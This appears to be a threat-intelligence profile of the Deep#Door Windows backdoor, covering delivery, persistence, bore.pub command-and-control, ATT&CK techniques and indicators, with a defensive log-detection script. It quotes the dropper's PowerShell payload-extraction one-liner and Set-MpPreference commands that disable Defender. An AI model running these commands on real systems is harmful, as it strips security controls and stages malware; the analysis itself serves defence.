DEEP#DOOR
Deep#Door is a Python-based backdoor and credential-stealing remote access trojan targeting Windows systems. According to Securonix reporting, it is delivered via an obfuscated batch-file dropper, most notably install_obf.bat, with some reporting also referencing finallyJob.bat. The loader disables or tampers with Windows security controls, suppresses PowerShell and firewall logging, bypasses SmartScreen, and extracts an embedded Python implant from its own script body rather than downloading a second stage. Reported implant filenames include svc.py and c.py, with svc.py written to %LOCALAPPDATA%\SystemServices\ to blend in with legitimate components.
Deep#Door establishes persistent access through multiple redundant mechanisms, including Startup folder scripts, Registry Run keys, Scheduled Tasks, and optional WMI event subscriptions. It also uses a watchdog mechanism to restore persistence artifacts if they are removed. For command and control, the malware uses the public TCP tunneling service bore.pub, including dynamic port discovery and challenge-response authentication, allowing operators to avoid dedicated attacker infrastructure and blend traffic with legitimate tunneling activity. The content specifically notes candidate outbound ports 41234-41243 and broader scanning from 1024-65535 to locate an active tunnel.
Its capabilities include remote shell/command execution, file transfer, reconnaissance, port and internal network scanning, keylogging, clipboard monitoring, screenshot capture, webcam access, microphone/audio recording, and broad credential theft. Reported theft targets include browser credentials from Chrome, Edge, Firefox, Windows Credential Manager, Wi-Fi profiles, SSH private keys, and cloud credentials or tokens associated with AWS, Azure, and GCP. The malware is described as suitable for long-term espionage, credential exfiltration, lateral movement, and post-exploitation.
Deep#Door also incorporates extensive anti-analysis and defense-evasion features, including sandbox, debugger, and virtual machine detection, AMSI and ETW patching, ntdll unhooking, Microsoft Defender tampering, command-line wiping, timestamp stomping, and event log clearing. Reporting further attributes destructive capabilities to the malware, including Master Boot Record overwrite, forced system crashes/BSOD, and a fork bomb. Distribution is assessed as likely via traditional methods such as phishing, but the scale of attacks, success rate, and specific threat actor attribution are not reported. High-confidence indicators and artifacts mentioned include install_obf.bat, finallyJob.bat, svc.py, c.py, SystemServices.vbs, the path %LOCALAPPDATA%\SystemServices, Startup-folder persistence under %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, a Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and outbound connections to bore.pub, especially on ports 41234-41243.
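The bore.pub tunnel discovery described above (candidate ports 41234-41243, then a sweep of 1024-65535 to find an active tunnel) leaves a recognizable pattern in outbound-connection telemetry. The following is an added detection example, not code from the Securonix reporting or from this page; the firewall log format, the sample lines and the sweep threshold of 20 distinct ports are assumptions.

```python
"""Flag Deep#Door-style bore.pub tunnel discovery in outbound-connection logs.

Signals from the reporting: (1) any outbound connection to bore.pub on the candidate
ports 41234-41243; (2) one host touching many distinct ports on one destination in
1024-65535, which is what the tunnel-locating sweep looks like from the edge.
"""
import re
from collections import defaultdict

CANDIDATE_PORTS = range(41234, 41244)    # 41234-41243 inclusive, from the reporting
SWEEP_RANGE = range(1024, 65536)         # 1024-65535 inclusive, from the reporting
SWEEP_THRESHOLD = 20                     # assumed tuning value: distinct ports per (src, dst)

# Constructed sample lines, not real telemetry. The format is an assumed generic
# firewall export: "<timestamp> src=<ip> dst=<host> dport=<port> action=<allow|deny>".
SAMPLE_LINES = [
    "2024-05-01T10:00:01Z src=10.0.0.15 dst=bore.pub dport=41234 action=allow",
    "2024-05-01T10:00:02Z src=10.0.0.15 dst=bore.pub dport=41235 action=allow",
    "2024-05-01T10:00:03Z src=10.0.0.22 dst=update.example.com dport=443 action=allow",
    "2024-05-01T10:00:04Z src=10.0.0.22 dst=mail.example.com dport=993 action=allow",
] + [
    # one host sweeping 30 consecutive high ports on bore.pub (constructed)
    f"2024-05-01T10:01:{i:02d}Z src=10.0.0.31 dst=bore.pub dport={2000 + i} action=deny"
    for i in range(30)
]

LINE_RE = re.compile(r"src=(\S+)\s+dst=(\S+)\s+dport=(\d+)")


def analyze(lines):
    """Return alert tuples: ('bore_candidate_port', src, port) or ('port_sweep', src, dst, n)."""
    alerts = []
    ports_by_pair = defaultdict(set)      # (src, dst) -> distinct destination ports seen
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue                      # unparseable line: skip rather than abort the hunt
        src, dst, port = m.group(1), m.group(2).lower(), int(m.group(3))
        if dst == "bore.pub" or dst.endswith(".bore.pub"):
            if port in CANDIDATE_PORTS:
                alerts.append(("bore_candidate_port", src, port))
        if port in SWEEP_RANGE:
            ports_by_pair[(src, dst)].add(port)
    for (src, dst), ports in ports_by_pair.items():
        if len(ports) >= SWEEP_THRESHOLD:
            alerts.append(("port_sweep", src, dst, len(ports)))
    return alerts
```

On the constructed sample this yields two candidate-port hits for 10.0.0.15 and one sweep alert for 10.0.0.31; the sweep check is destination-agnostic, so it also covers the implant's own port_scan() activity against internal hosts.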
Techniques & procedures
41 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (1 technique)
Execution (5 techniques)
This is achieved using the following PowerShell command:
powershell -NoP -Command "$f=[IO.File]::ReadAllText('%~f0');$m=[regex]::Match($f,'(?s)#PYTHON_START\r?\n(.+?)\r?\n#PYTHON_END');if($m.Success){[IO.File]::WriteAllText('%LOCALAPPDATA%\SystemServices\svc.py',$m.Groups[1].Value)}"
The attack chain starts with a single batch file: install_obf.bat. When executed, this script reads itself, literally parsing its own contents to extract a hidden Python payload embedded directly inside the script. The extracted file, svc.py, is then written quietly to %LOCALAPPDATA%\SystemServices\.
Once active, the implant is a fully featured remote access tool. Operators can execute shell commands...
Persistence (3 techniques)
persistence achieved through registry run keys, scheduled tasks, and startup folder entries
Privilege Escalation (4 techniques)
Optional WMI Persistence: The malware can deploy a WMI event subscription, which triggers execution based on system events or time intervals.
Stealth (8 techniques)
Attacks begin with the execution of an obfuscated batch file
Event Log Service Disruption: stops and disables the Event Log service and clears existing logs.
Timestamp Stomping: to blend in with legitimate system files, the malware modifies file metadata; file creation, access, and modification timestamps are altered to match trusted binaries.
Once written to disk, the Python payload itself contains additional layers of encoding and obfuscation, requiring runtime decoding:
1. Base64 Decoding Function ...
2. XOR Obfuscation Routine
Discovery of Deep#Door compromise has also been complicated by virtual machine, debugging tool, and sandbox environment checks
Credential Access (4 techniques)
before proceeding with keylogging, browser credential theft, screenshot capturing, and microphone recording
as well as SSH key and cloud authentication token siphoning for lateral movement
Discovery (7 techniques)
The resulting implant operates as a fully featured Remote Access Trojan (RAT) capable of long-term persistence, espionage, lateral movement, and post-exploitation operations within compromised environments.
port_scan() scans internal or external hosts to identify reachable services and potential pivot targets.
Process Enumeration: scans running processes for analysis tools such as Wireshark, Procmon, x64dbg, IDA, and Burp Suite.
Hardware Fingerprinting: uses PowerShell queries (WMI/CIM) to inspect BIOS version strings, manufacturer and model, and baseboard details.
get_ssh_keys() scans user directories for private SSH keys used for remote access.
Collection (5 techniques)
before proceeding with keylogging, browser credential theft, screenshot capturing, and microphone recording
clipmon_start() monitors clipboard changes to capture copied sensitive data such as passwords or tokens.
Command and Control (4 techniques)
MITRE ATT&CK Matrix ... Command and Control T1071.001 – Application Layer Protocol: Web Protocols
the backdoor, which communicates with attacker infrastructure using a public TCP tunneling service
Exfiltration (2 techniques)
Impact (1 technique)
Other (4 techniques)
Attacks begin with the execution of an obfuscated batch file that deactivates Windows security controls prior to embedded Python payload extraction
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
IOCs tracked for this family
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
5 sources tracked across advisories, community write-ups, and news.
A Python-based remote access trojan/backdoor for Windows that is embedded inside a batch-file dropper, disables defenses, uses multiple persistence mechanisms, evades analysis, communicates through the public TCP tunneling service bore.pub, and supports capabilities including command execution, screenshots, audio recording, keylogging, webcam access, credential theft, SSH/cloud credential theft, network scanning, and destructive actions such as MBR overwrite or forced system crash.
A Python-based backdoor framework used for stealthy surveillance and credential theft on Windows. It is delivered via an obfuscated batch file that disables security controls, extracts embedded Python payloads, establishes persistence through registry run keys, scheduled tasks, and startup folder entries, and uses a public TCP tunneling service for command-and-control. Reported capabilities include keylogging, browser credential theft, screenshot capture, microphone recording, SSH key theft, cloud authentication token theft, anti-VM/debugging/sandbox checks, Windows telemetry patching, and boot record overwrite/system crash functionality.
Python-based Windows malware delivered via an obfuscated batch script that embeds and launches a Python RAT payload. It establishes persistence through Startup folder scripts, Registry Run keys, Scheduled Tasks, and optional WMI subscriptions; communicates through a TCP tunneling service; supports remote command execution, keylogging, webcam and microphone capture, screen capture, credential theft, lateral movement, and post-exploitation; and uses multiple defense-evasion techniques including SmartScreen disabling, AMSI/ETW patching, event log clearing, timestamp stomping, sandbox detection, unhooking, Defender tampering, and command-line stripping.
A stealthy Python-based backdoor framework and fully featured remote access trojan that establishes persistent access, communicates via the bore.pub tunneling service, enables remote command execution, surveillance, credential theft, cloud credential theft, keylogging, screenshot and webcam capture, audio recording, and uses extensive anti-analysis, defense evasion, and persistence mechanisms.